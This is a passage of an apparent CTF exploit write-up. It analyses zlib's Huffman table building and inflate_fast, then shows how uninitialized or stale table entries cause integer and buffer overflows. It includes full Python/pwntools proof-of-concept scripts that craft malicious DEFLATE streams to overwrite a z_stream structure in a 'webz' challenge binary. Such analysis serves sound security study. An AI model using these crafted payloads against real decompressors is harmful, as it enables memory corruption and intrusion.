here(op=0, bits=2, val='C') next[3(0b011)] = here(op=0, bits=3, val='D') next[7(0b111)] = here(op=0, bits=3, val='E') So the correct index order is 0,2,1,3,7 rather than 0,1,2,6,7. incr = 1U << ( len - drop ) ; fill = 1U << curr ; min = fill ; do { fill -= incr ; next [ ( huff >> drop ) + fill ] = here ; } while ( fill != 0 ) ; Back to the loop. huff holds the (bit-reversed) Huffman code in progress. We don’t just store at next[huff] ; we fill out all positions differing only in the unused high bits of the primary table. fill is 1 << curr (table size), and incr is 1 << len (or 1 << (len - drop) for sub-tables). So the effect is: If the primary table has curr=root bits, and huff=0b111 with code length 3, then fill covers: 0b00111 0b01111 0b10111 0b11111 We’re enumerating the higher bits that are irrelevant to this code length. This allows constant-time decoding: next[0(0b00), 4(0b100)] = here(op=0, bits=2, val='A') next[2(0b10), 6(0b110)] = here(op=0, bits=2, val='B') next[1(0b01), 6(0b101)] = here(op=0, bits=2, val='C') next[3(0b011)] = here(op=0, bits=3, val='D') next[7(0b111)] = here(op=0, bits=3, val='E') When decoding AC (0b0100), we can immediately index next[0b100] with BITS(root) and decode ‘A’ without checking code lengths; then drop 2 bits and continue. Back to the actual decoding: here = state -> lencode [ BITS ( state -> lenbits ) ] ; This implements the same idea: index with fixed lenbits and decode immediately. The while loop plus fill/incr achieve this optimization. incr = 1U << ( len - 1 ) ; while ( huff & incr ) incr >>= 1 ; if ( incr != 0 ) { huff &= incr - 1 ; huff += incr ; } else huff = 0 ; This updates huff in bit-reversed order: 00,01,10,110,111 -> X 00,10,01,011,111 -> O i.e., increment with bit-reversed semantics. sym ++ ; if ( -- ( count [ len ] ) == 0 ) { if ( len == max ) break ; len = lens [ work [ sym ] ] ; } Move to the next symbol and update the working code length. if ( len > root && ( huff & mask ) != low ) { if ( drop == 0 ) drop = root ; next += min ; curr = len - drop ; left = ( int ) ( 1 << curr ) ; while ( curr + drop < max ) { left -= count [ curr + drop ] ; if ( left <= 0 ) break ; curr ++ ; left <<= 1 ; } used += 1U << curr ; low = huff & mask ; ( * table ) [ low ] . op = ( unsigned char ) curr ; ( * table ) [ low ] . bits = ( unsigned char ) root ; ( * table ) [ low ] . val = ( unsigned short ) ( next - * table ) ; } } This creates a sub-table when len > root . Let’s illustrate with the earlier example: next[0(0b00), 4(0b100)] = here(op=0, bits=2, val='A') next[2(0b10), 6(0b110)] = here(op=0, bits=2, val='B') next[1(0b01), 5(0b101)] = here(op=0, bits=2, val='C') next[3(0b011)] = here(op=0, bits=3, val='D') next[7(0b111)] = here(op=0, bits=3, val='E') Assume root=2 (for illustration), so 3‑bit codes require a sub-table. Due to default state->lenbits , you wouldn’t actually see root=2 with multi-level tables in practice; we’re using small numbers for clarity. next[0(0b00)] = here(op=0, bits=2, val='A') next[2(0b10)] = here(op=0, bits=2, val='B') next[1(0b01)] = here(op=0, bits=2, val='C') Codes of length ≤2 fit in the primary table. if ( drop == 0 ) drop = root ; next += min ; We set drop (the number of lower bits to ignore when indexing sub-tables) and advance next to the end of the current table—this is where the sub-table will live. Now the sub-table is ready: next points to it, and drop=root causes future huff indices to ignore the lower root bits. On subsequent iterations, entries for the longer codes are placed into the sub-table: next += 1 << curr next[0(0b011 >> 2)] = here(op=0, bits=1 (3-2), val='D') next[1(0b111 >> 2)] = here(op=0, bits=1 (3-2), val='E') Note here.bits = len - drop , so the sub-table stores only the remaining bits. low = huff & mask ; ( * table ) [ low ] . op = ( unsigned char ) curr ; ( * table ) [ low ] . bits = ( unsigned char ) root ; ( * table ) [ low ] . val = ( unsigned short ) ( next - * table ) ; We also write into the primary table an entry that points to the sub-table. The final multi-level table looks like: next [ 0 ( 0 b00 ) ] = here ( op = 0 , bits = 2 , val = 'A' ) next [ 2 ( 0 b10 ) ] = here ( op = 0 , bits = 2 , val = 'B' ) next [ 1 ( 0 b01 ) ] = here ( op = 0 , bits = 2 , val = 'C' ) next [ 3 ( 0 b011 & mask ( ( 1 << 2 ) - 1 ) ) ] = here ( op = 2 , bits = 2 , val = 4 ) next += 1 << curr next [ 0 ( 0 b011 >> 2 ) ] = here ( op = 0 , bits = 1 ( 3 - 2 ) , val = 'D' ) next [ 1 ( 0 b111 >> 2 ) ] = here ( op = 0 , bits = 1 ( 3 - 2 ) , val = 'E' ) Decoding a 3‑bit code like ‘E’ works like this: first-level lookup at 0b011 & mask = 0b11 yields here(op=2, bits=2, val=4) , so we consume 2 bits and jump to the sub-table ( next += 4 ). Then we use the next bit (1) to index the sub-table, yielding here(op=0, bits=1, val='E') ; we consume 1 bit and emit ‘E’. if ( huff != 0 ) { here . op = ( unsigned char ) 64 ; here . bits = ( unsigned char ) ( len - drop ) ; here . val = ( unsigned short ) 0 ; next [ huff ] = here ; } * table += used ; * bits = root ; return 0 ; Finally, if the code set is incomplete, the remaining entry is filled with an invalid code marker, then bits is updated and the function returns. 3-3. Decode void ZLIB_INTERNAL inflate_fast ( z_streamp strm , unsigned start ) { struct inflate_state FAR * state ; z_const unsigned char FAR * in ; z_const unsigned char FAR * last ; unsigned char FAR * out ; unsigned char FAR * beg ; unsigned char FAR * end ; # ifdef INFLATE_STRICT unsigned dmax ; # endif unsigned wsize ; unsigned whave ; unsigned wnext ; unsigned char FAR * window ; unsigned long hold ; unsigned bits ; code const FAR * lcode ; code const FAR * dcode ; unsigned lmask ; unsigned dmask ; code const * here ; unsigned op ; unsigned len ; unsigned dist ; unsigned char FAR * from ; state = ( struct inflate_state FAR * ) strm -> state ; in = strm -> next_in ; last = in + ( strm -> avail_in - 5 ) ; out = strm -> next_out ; beg = out - ( start - strm -> avail_out ) ; end = out + ( strm -> avail_out - 257 ) ; # ifdef INFLATE_STRICT dmax = state -> dmax ; # endif wsize = state -> wsize ; whave = state -> whave ; wnext = state -> wnext ; window = state -> window ; hold = state -> hold ; bits = state -> bits ; lcode = state -> lencode ; dcode = state -> distcode ; lmask = ( 1U << state -> lenbits ) - 1 ; dmask = ( 1U << state -> distbits ) - 1 ; Time to analyze inflate_fast . do { if ( bits < 15 ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } . . . . . . . . . . . . . . . } while ( in < last && out < end ) ; It loops until the preconditions fail. At the start of each iteration, if fewer than 15 bits are available in hold , it preloads 16 bits. This reduces overhead in the inner loop. here = lcode + ( hold & lmask ) ; dolen : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; op = ( unsigned ) ( here -> op ) ; if ( op == 0 ) { Tracevv ( ( stderr , here -> val >= 0x20 && here -> val < 0x7f ? "inflate: literal '%c' " : "inflate: literal 0x%02x " , here -> val ) ) ; * out ++ = ( unsigned char ) ( here -> val ) ; } else if ( op & 16 ) { len = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( op ) { if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } len += ( unsigned ) hold & ( ( 1U << op ) - 1 ) ; hold >>= op ; bits -= op ; } Tracevv ( ( stderr , "inflate: length %u " , len ) ) ; if ( bits < 15 ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } The logic mirrors inflate.c : look up a code in lcode . If it’s a literal, emit it and continue; if it’s a length, decode the length and then decode the distance next, preloading more bits first. here = dcode + ( hold & dmask ) ; dodist : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; op = ( unsigned ) ( here -> op ) ; if ( op & 16 ) { dist = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } } dist += ( unsigned ) hold & ( ( 1U << op ) - 1 ) ; # ifdef INFLATE_STRICT if ( dist > dmax ) { strm -> msg = ( z_const char * ) "invalid distance too far back" ; state -> mode = BAD ; break ; } # endif hold >>= op ; bits -= op ; Tracevv ( ( stderr , "inflate: distance %u " , dist ) ) ; Distance decoding follows. After that, the LZ77 copy routine (not shown here) copies bytes from the window; the code is messy because it optimizes for various cases. else if ( ( op & 64 ) == 0 ) { here = dcode + here -> val + ( hold & ( ( 1U << op ) - 1 ) ) ; goto dodist ; } else { strm -> msg = ( z_const char * ) "invalid distance code" ; state -> mode = BAD ; break ; } } else if ( ( op & 64 ) == 0 ) { here = lcode + here -> val + ( hold & ( ( 1U << op ) - 1 ) ) ; goto dolen ; } else if ( op & 32 ) { Tracevv ( ( stderr , "inflate: end of block " ) ) ; state -> mode = TYPE ; break ; } else { strm -> msg = ( z_const char * ) "invalid literal/length code" ; state -> mode = BAD ; break ; } After the LZ77 copy, the code handles second-level table lookups and invalid codes. 4. Vulnerability We analyzed the principal parts of Inflate , the decoder for Deflate . Do you see the bug? Everything looks well designed. 4-1. Unintialized Huffman Code Table There’s a subtle issue in the Huffman table construction. A Huffman table can be incomplete. For example, if root is 8 and the maximum code length is 10, there will be no entries for length‑9 codes; i.e., some table entries remain unset. Are such NULL entries handled correctly during decoding? if ( here . op & 64 ) { strm -> msg = ( z_const char * ) "invalid literal/length code" ; state -> mode = BAD ; break ; } . . . if ( here . op & 64 ) { strm -> msg = ( z_const char * ) "invalid distance code" ; state -> mode = BAD ; break ; } if ( huff != 0 ) { here . op = ( unsigned char ) 64 ; here . bits = ( unsigned char ) ( len - drop ) ; here . val = ( unsigned short ) 0 ; next [ huff ] = here ; } No. As we’ve seen, incomplete entries should be filled with op=64 (invalid). As a result, any NULL entries get treated as if they were code structures with op=0, bits=0, val=0 . Or, they may retain stale values from a previous block. 4-2. Exploiting inflate_fast To achieve high speed, inflate_fast omits many checks; it can therefore cause memory corruption when encountering incomplete Huffman tables. Let’s explore how. The first memory bug identified was an integer overflow, but it wasn’t exploitable. The second was a stream overflow, which we ultimately exploited. We’ll describe both. 4-2-1. Integer Overflow (Unexploitable) Let’s see what happens when a zero‑initialized table entry ( op=0, bits=0, val=0 ) is used in decoding. dolen : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; op = ( unsigned ) ( here -> op ) ; if ( op == 0 ) { Tracevv ( ( stderr , here -> val >= 0x20 && here -> val < 0x7f ? "inflate: literal '%c' " : "inflate: literal 0x%02x " , here -> val ) ) ; * out ++ = ( unsigned char ) ( here -> val ) ; } In the literal path, a code with op=0, bits=0, val=0 consumes zero bits and decodes a null byte. Since no bits are consumed, inflate_fast would loop forever decoding that same entry. } while ( in < last && out < end ) ; However, the loop is bounded by out < end , so no overflow occurs here. dolen : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; . . . else if ( op & 16 ) { len = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( op ) { if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } len += ( unsigned ) hold & ( ( 1U << op ) - 1 ) ; hold >>= op ; bits -= op ; } . . . else if ( ( op & 64 ) == 0 ) { here = lcode + here -> val + ( hold & ( ( 1U << op ) - 1 ) ) ; goto dolen ; } What about the length path? Because of the op checks, the code falls into the second-level table lookup. With zero bits consumed, it indexes the 0th entry again. dodist : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; op = ( unsigned ) ( here -> op ) ; if ( op & 16 ) { dist = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } } . . . . else if ( ( op & 64 ) == 0 ) { here = dcode + here -> val + ( hold & ( ( 1U << op ) - 1 ) ) ; goto dodist ; } Distance decoding behaves similarly, but worse: the second-level lookup jumps back into the distance decode path. The “0th table entry” behavior is dangerous, because the second-level lookup is designed to read a sub-table (with smaller bits ), but instead it’s indexing the primary table. inflate_fast keeps at least 16 bits in hold and assumes no codes exceed 15 bits, so it omits checks. The erroneous “0th entry” lookup breaks this assumption. Why are Huffman codes guaranteed ≤15 bits? Because the Code Huffman table itself can only encode lengths up to 15; longer lengths cannot be represented. Consider: Bit buffer size: 16 (minimum present) Primary table root: 10 Maximum Huffman code length: 12 1. Normal second-level distance lookup -> uninitialized entry `op=0, bits=0, val=0` (bits: 16 - 10 = 6) 2. Abnormal second-level lookup -> 0th primary-table entry (bits: 6 - 0 = 6) 3. Decoding the 0th primary-table entry (bits: 6 - 10 = -2) As noted, the distance path jumps back into distance decoding after the second-level lookup, so the primary table (not sub-table) is indexed next, consuming too many bits. Ultimately, the bits counter underflows—an integer overflow. len = bits >> 3 ; in -= len ; bits -= len << 3 ; hold &= ( 1U << bits ) - 1 ; strm -> next_in = in ; strm -> next_out = out ; strm -> avail_in = ( unsigned ) ( in < last ? 5 + ( last - in ) : 5 - ( in - last ) ) ; strm -> avail_out = ( unsigned ) ( out < end ? 257 + ( end - out ) : 257 - ( out - end ) ) ; state -> hold = hold ; state -> bits = bits ; return ; At the end of inflate_fast , the code adjusts in / avail_in by the number of unused bits. Thus, the integer overflow in bits corrupts strm->next_in and strm->avail_in , affecting subsequent decoding. 4-2-2. PoC import struct class BitStream : """LSB-first bit stream writer.""" def __init__ ( self ) : self . bits = 0 self . bit_count = 0 self . data = bytearray ( ) def write_bits ( self , value , num_bits ) : for i in range ( num_bits ) : bit = ( value >> i ) & 1 if bit : self . bits | = ( 1 << self . bit_count ) self . bit_count += 1 if self . bit_count == 8 : self . data . append ( self . bits ) self . bits = 0 self . bit_count = 0 def get_bytes ( self ) : if self . bit_count > 0 : self . data . append ( self . bits ) return self . data def generate_huffman_codes_from_lengths ( lengths ) : max_len = 0 for length in lengths : if length > max_len : max_len = length if max_len == 0 : return { } bl_count = [ 0 ] * ( max_len + 1 ) for length in lengths : if length > 0 : bl_count [ length ] += 1 code = 0 next_code = [ 0 ] * ( max_len + 1 ) for bits_len in range ( 1 , max_len + 1 ) : code = ( code + bl_count [ bits_len - 1 ] ) << 1 next_code [ bits_len ] = code huffman_codes = { } for i , length in enumerate ( lengths ) : if length != 0 : rev_code = int ( f' { next_code [ length ] : 0 { length } b } ' [ : : - 1 ] , 2 ) huffman_codes [ i ] = ( rev_code , length ) next_code [ length ] += 1 return huffman_codes lbase = [ 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 13 , 15 , 17 , 19 , 23 , 27 , 31 , 35 , 43 , 51 , 59 , 67 , 83 , 99 , 115 , 131 , 163 , 195 , 227 , 258 ] lext = [ 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 1 , 1 , 1 , 1 , 2 , 2 , 2 , 2 , 3 , 3 , 3 , 3 , 4 , 4 , 4 , 4 , 5 , 5 , 5 , 5 , 0 ] dbase = [ 1 , 2 , 3 , 4 , 5 , 7 , 9 , 13 , 17 , 25 , 33 , 49 , 65 , 97 , 129 , 193 , 257 , 385 , 513 , 769 , 1025 , 1537 , 2049 , 3073 , 4097 , 6145 , 8193 , 12289 , 16385 , 24577 ] dext = [ 0 , 0 , 0 , 0 , 1 , 1 , 2 , 2 , 3 , 3 , 4 , 4 , 5 , 5 , 6 , 6 , 7 , 7 , 8 , 8 , 9 , 9 , 10 , 10 , 11 , 11 , 12 , 12 , 13 , 13 ] order = [ 16 , 17 , 18 , 0 , 8 , 7 , 9 , 6 , 10 , 5 , 11 , 4 , 12 , 3 , 13 , 2 , 14 , 1 , 15 ] def find_len_sym ( length ) : for i in range ( len ( lbase ) ) : if lbase [ i ] > length : i -= 1 break base_len = lbase [ i ] extra_bits = lext [ i ] extra_val = length - base_len return 257 + i , extra_bits , extra_val def find_dist_sym ( distance ) : for i in range ( len ( dbase ) ) : if dbase [ i ] > distance : i -= 1 break base_dist = dbase [ i ] extra_bits = dext [ i ] extra_val = distance - base_dist return i , extra_bits , extra_val def encode_lengths_rle ( lengths ) : encoded = [ ] i = 0 while i < len ( lengths ) : current_len = lengths [ i ] if current_len == 0 : count = 0 while i + count < len ( lengths ) and lengths [ i + count ] == 0 and count < 138 : count += 1 if count >= 11 : encoded . append ( ( 18 , count - 11 ) ) i += count continue if count >= 3 : encoded . append ( ( 17 , count - 3 ) ) i += count continue if i > 0 and current_len == lengths [ i - 1 ] : count = 0 while i + count < len ( lengths ) and lengths [ i + count ] == current_len and count < 6 : count += 1 if count >= 3 : encoded . append ( ( 16 , count - 3 ) ) i += count continue encoded . append ( ( current_len , None ) ) i += 1 return encoded def create_dynamic_deflate_payload ( stream , is_last , symbol_stream , ll_lengths , dist_lengths ) : nlen = max ( i for i , length in enumerate ( ll_lengths ) if length > 0 ) + 1 ndist = max ( i for i , length in enumerate ( dist_lengths ) if length > 0 ) + 1 all_lengths = ll_lengths [ : nlen ] + dist_lengths [ : ndist ] rle_encoded_lengths = encode_lengths_rle ( all_lengths ) rle_symbols = [ item [ 0 ] for item in rle_encoded_lengths ] code_symbol_freqs = { sym : rle_symbols . count ( sym ) for sym in set ( rle_symbols ) } code_table_lengths = [ 0 ] * 19 for sym in code_symbol_freqs : code_table_lengths [ sym ] = 7 ncode = max ( i for i , length in enumerate ( order ) if code_table_lengths [ length ] > 0 ) + 1 code_huffman_table = generate_huffman_codes_from_lengths ( code_table_lengths ) stream . write_bits ( is_last , 1 ) stream . write_bits ( 2 , 2 ) stream . write_bits ( nlen - 257 , 5 ) stream . write_bits ( ndist - 1 , 5 ) stream . write_bits ( ncode - 4 , 4 ) for i in range ( ncode ) : stream . write_bits ( code_table_lengths [ order [ i ] ] , 3 ) for sym , extra_val in rle_encoded_lengths : code , length = code_huffman_table [ sym ] stream . write_bits ( code , length ) if sym == 16 : stream . write_bits ( extra_val , 2 ) elif sym == 17 : stream . write_bits ( extra_val , 3 ) elif sym == 18 : stream . write_bits ( extra_val , 7 ) ll_huffman_table = generate_huffman_codes_from_lengths ( ll_lengths ) dist_huffman_table = generate_huffman_codes_from_lengths ( dist_lengths ) for type , val in symbol_stream : if type == 'LIT' : code , length = ll_huffman_table [ val ] stream . write_bits ( code , length ) elif type == 'EOB' : code , length = ll_huffman_table [ val ] stream . write_bits ( code , length ) elif type == 'LD' : l , d = val len_sym , len_extra_bits , len_extra_val = find_len_sym ( l ) dist_sym , dist_extra_bits , dist_extra_val = find_dist_sym ( d ) code , length = ll_huffman_table [ len_sym ] stream . write_bits ( code , length ) if len_extra_bits > 0 : stream . write_bits ( len_extra_val , len_extra_bits ) code , length = dist_huffman_table [ dist_sym ] stream . write_bits ( code , length ) if dist_extra_bits > 0 : stream . write_bits ( dist_extra_val , dist_extra_bits ) elif type == 'INVALID' : code , length = val stream . write_bits ( code , length ) stream = BitStream ( ) symbol_stream = [ ( 'LIT' , 65 ) , ( 'LIT' , 65 ) , ( 'LIT' , 66 ) , ( 'LIT' , 67 ) , ( 'LD' , ( 3 , 3 ) ) ] symbol_stream . append ( ( "INVALID" , ( int ( '000000000000110' [ : : - 1 ] , 2 ) , 15 ) ) ) symbol_stream . append ( ( "INVALID" , ( int ( '000000001001' [ : : - 1 ] , 2 ) , 12 ) ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) for i in range ( 0 , 0x200 ) : symbol_stream . append ( ( 'LIT' , 65 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 65 ] = 15 ll_lengths [ 66 ] = 15 ll_lengths [ 67 ] = 15 ll_lengths [ 68 ] = 15 ll_lengths [ 69 ] = 15 ll_lengths [ 256 ] = 15 ll_lengths [ 257 ] = 15 dist_lengths = [ 0 ] * 30 dist_lengths [ 2 ] = 10 dist_lengths [ 3 ] = 10 dist_lengths [ 4 ] = 12 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) payload = stream . get_bytes ( ) print ( f"Generated DEFLATE payload ( { len ( payload ) } bytes):" ) print ( payload . hex ( ) ) from pwn import * p = process ( "./src/webz_asan" ) def send_webz_payload ( pay ) : MAX_AROUND_WIDTH_HEIGHT = p8 ( 0x0 ) + p8 ( 52 ) + p8 ( 0x0 ) + p8 ( 52 ) p . send ( p32 ( len ( pay ) + 12 ) ) p . send ( b"WEBZ" + MAX_AROUND_WIDTH_HEIGHT + b"\x00\x00\x00\x00" + pay ) send_webz_payload ( payload ) p . interactive ( ) We reproduce the case described above. The Distance table has root=10 with a maximum code length of 12, so there are unfilled entries with op=0, bits=0, val=0 . By crafting the stream to force a multilevel lookup, we can trigger the vulnerability. symbol_stream . append ( ( "INVALID" , ( int ( '000000000000110' [ : : - 1 ] , 2 ) , 15 ) ) ) symbol_stream . append ( ( "INVALID" , ( int ( '000000001001' [ : : - 1 ] , 2 ) , 12 ) ) ) These are key. The first is a valid 15‑bit length code. The second is an invalid 12‑bit distance code. dist_lengths [ 4 ] = 12 The valid distance‑5 code is 000000001000 . Instead, 000000001001 forces a second‑level lookup that reads an uninitialized code entry. As a result, next_in / avail_in are corrupted. However, this particular memory corruption was not exploitable. If we first decompress dummy data in block one, and then in a second block trigger the bug with a Literal/Length table that only contains EOB, we can corrupt next_in / avail_in without crashing. But since these are input stream variables (not output buffer variables), we couldn’t achieve an overflow or OOB write on the decompressed output buffer. 4-2-3. Buffer Overflow (Exploitable) So what should we target to exploit uninitialized table entries? The most promising avenue in zlib is to abuse the copy routines. The stored-block copy and the LZ77 copy are powerful overwrite primitives—if we can disable the checks that constrain them. In other words, we need to corrupt avail_out , not avail_in . Let’s inspect inflate_fast ’s LZ77 decode. else if ( op & 16 ) { len = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( op ) { if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } len += ( unsigned ) hold & ( ( 1U << op ) - 1 ) ; hold >>= op ; bits -= op ; } Tracevv ( ( stderr , "inflate: length %u " , len ) ) ; if ( bits < 15 ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } here = dcode + ( hold & dmask ) ; dodist : op = ( unsigned ) ( here -> bits ) ; hold >>= op ; bits -= op ; op = ( unsigned ) ( here -> op ) ; if ( op & 16 ) { dist = ( unsigned ) ( here -> val ) ; op &= 15 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; if ( bits < op ) { hold += ( unsigned long ) ( * in ++ ) << bits ; bits += 8 ; } } dist += ( unsigned ) hold & ( ( 1U << op ) - 1 ) ; # ifdef INFLATE_STRICT if ( dist > dmax ) { strm -> msg = ( z_const char * ) "invalid distance too far back" ; state -> mode = BAD ; break ; } # endif hold >>= op ; bits -= op ; Tracevv ( ( stderr , "inflate: distance %u " , dist ) ) ; The LZ77 decode in inflate_fast has almost no checks. The only guard is if (dist > dmax) , behind INFLATE_STRICT . How can it still be safe? static const unsigned short lbase [ 31 ] = { 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 13 , 15 , 17 , 19 , 23 , 27 , 31 , 35 , 43 , 51 , 59 , 67 , 83 , 99 , 115 , 131 , 163 , 195 , 227 , 258 , 0 , 0 } ; static const unsigned short lext [ 31 ] = { 16 , 16 , 16 , 16 , 16 , 16 , 16 , 16 , 17 , 17 , 17 , 17 , 18 , 18 , 18 , 18 , 19 , 19 , 19 , 19 , 20 , 20 , 20 , 20 , 21 , 21 , 21 , 21 , 16 , 73 , 200 } ; The maximum copy length (LZ77 length) is lbase[28] (258) + ((lext[28] (16) & 15) == 0) → 258. Earlier we noted that inflate_fast is entered only when strm->avail_out >= 258 , and the loop exits as soon as that’s no longer true. Thus, inflate_fast can safely omit length checks because it guarantees there are at least 258 bytes of space. state -> next = state -> codes ; state -> lencode = state -> distcode = ( const code FAR * ) ( state -> next ) ; state -> lenbits = 7 ; ret = inflate_table ( CODES , state -> lens , 19 , & ( state -> next ) , & ( state -> lenbits ) , state -> work ) ; In inflate , tables are written into state->codes , which is not cleared between blocks. The tables’ boundaries aren’t fixed either; state->next advances dynamically, so different blocks can lay out different tables at different offsets. Therefore, stale entries from a previous block can persist in uninitialized slots of later tables—even of different types. If a Distance-table entry from a previous block remains in an uninitialized slot of the subsequent Literal/Length table, we’re in trouble. Deflate limits lengths to 258, but distances can be much larger. If a stale Distance entry is misinterpreted as a Length entry in inflate_fast , its length can exceed 258, breaking the invariant that made inflate_fast safe. strm -> avail_out = ( unsigned ) ( out < end ? 257 + ( end - out ) : 257 - ( out - end ) ) ; Ultimately, when the LZ77 decode interprets a stale Distance entry as a Length, strm->avail_out suffers an integer overflow. Unlike avail_in , avail_out reflects the remaining size of the output buffer, so this immediately leads to a buffer overflow. # define MAX_INPUT_SIZE 4096 # define MAX_OUTPUT_SIZE (MAX_INPUT_SIZE * 2) typedef struct EncodedWebz { uint8_t data [ MAX_INPUT_SIZE ] ; size_t size ; } EncodedWebz ; typedef struct DecodedWebz { uint8_t data [ MAX_OUTPUT_SIZE ] ; size_t size ; } DecodedWebz ; typedef struct WebzState { EncodedWebz encoded ; DecodedWebz decoded ; z_stream infstream ; char ok_status [ 5 ] ; } WebzState ; WebzState webz_state ; The decompressed bytes are written into the global webz_state in webz.c . To actually corrupt memory, we must write more than 8192 bytes and overflow into the following z_stream infstream , overwriting its fields. 4-2-4. PoC stream = BitStream ( ) stream . write_bits ( 0 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = 0x200 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'X' ) , 8 ) symbol_stream = [ ( 'EOB' , 256 ) ] ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 3 dist_lengths = [ 0 ] * 30 for i in range ( 17 , 30 ) : dist_lengths [ i ] = 15 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) symbol_stream = [ ] symbol_stream . append ( ( "INVALID" , ( 8 , 10 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0b1111111 , 7 ) ) ) symbol_stream . append ( ( "INVALID" , ( int ( '000' [ : : - 1 ] , 2 ) , 3 ) ) ) symbol_stream . append ( ( "INVALID" , ( 0b1111111 , 7 ) ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 256 ] = 10 ll_lengths [ 257 ] = 10 ll_lengths [ 258 ] = 12 dist_lengths = [ 0 ] * 30 dist_lengths [ 17 ] = 3 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) stream . write_bits ( 0 , 5 ) stream . write_bits ( 0 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = 0x10 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'C' ) , 8 ) symbol_stream = [ ] symbol_stream . append ( ( 'LIT' , 65 ) ) for i in range ( 0 , 0x2ce ) : symbol_stream . append ( ( 'LD' , ( 10 , 1 ) ) ) for i in range ( 0 , 7 ) : symbol_stream . append ( ( 'LIT' , 65 ) ) symbol_stream . append ( ( 'EOB' , 256 ) ) ll_lengths = [ 0 ] * 286 ll_lengths [ 65 ] = 3 ll_lengths [ 256 ] = 3 ll_lengths [ 264 ] = 3 dist_lengths = [ 0 ] * 30 dist_lengths [ 0 ] = 3 create_dynamic_deflate_payload ( stream , 0 , symbol_stream , ll_lengths , dist_lengths ) overwrriten_infstream = b'X' * 0x60 stream . write_bits ( 1 , 1 ) stream . write_bits ( 0 , 2 ) stream . bytebits ( ) stored_block_length = len ( overwrriten_infstream ) stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( overwrriten_infstream [ i ] , 8 ) """ 0x000064f4b0253370│+0x0000: 0x000064f4b02507de → 0x0000000000000000 0x000064f4b0253378│+0x0008: 0x0000000000000000 0x000064f4b0253380│+0x0010: 0x0000000000000472 0x000064f4b0253388│+0x0018: 0x000064f4b0253370 → 0x000064f4b02507de → 0x0000000000000000 0x000064f4b0253390│+0x0020: 0x00000000ffffe304 → 0x0000000000000000 0x000064f4b0253398│+0x0028: 0x0000000000002008 0x000064f4b02533a0│+0x0030: 0x000064f4b02533e0 → 0x0000000000000000 0x000064f4b02533a8│+0x0038: 0x0000000000000000 0x000064f4b02533b0│+0x0040: 0x000064f4af885820 → push rbp 0x000064f4b02533b8│+0x0048: 0x000064f4af8a3390 → push rbp 0x000064f4b02533c0│+0x0050: 0x0000000000000000 0x000064f4b02533c8│+0x0058: 0x0000000000000040 ("@"?) """ payload = stream . get_bytes ( ) print ( f"Generated DEFLATE payload ( { len ( payload ) } bytes):" ) p = process ( "./webz" ) def send_webz_payload ( pay ) : NORMAL_AROUND_WIDTH_HEIGHT = p8 ( 0x0 ) + p8 ( 52 ) + p8 ( 0x0 ) + p8 ( 5 ) p . send ( p32 ( len ( pay ) + 12 ) ) p . send ( b"WEBZ" + NORMAL_AROUND_WIDTH_HEIGHT + b"\x00\x00\x00\x00" + pay ) raw_input ( ) send_webz_payload ( payload ) p . interactive ( ) The PoC uses six blocks. Let’s walk through them. # STORED BLOCK =============================================================================== stream . write_bits ( 0 , 1 ) # BFINAL stream . write_bits ( 0 , 2 ) # BTYPE ( 0 for stored ) stream . bytebits ( ) stored_block_length = 0x200 stream . write_bits ( stored_block_length + ( ( stored_block_length ^ 0xffff ) << 16 ) , 32 ) for i in range ( 0 , stored_block_length ) : stream . write_bits ( ord ( 'X' ) , 8 ) # STORED BLOCK =============================================================================== Block 1: writes dummy bytes to the output buffer so that later copies with large distances won’t misbehave. # DYNAMIC BLOCK ============================================================================== symbol_stream = [ ( 'EOB' , 256 ) ] 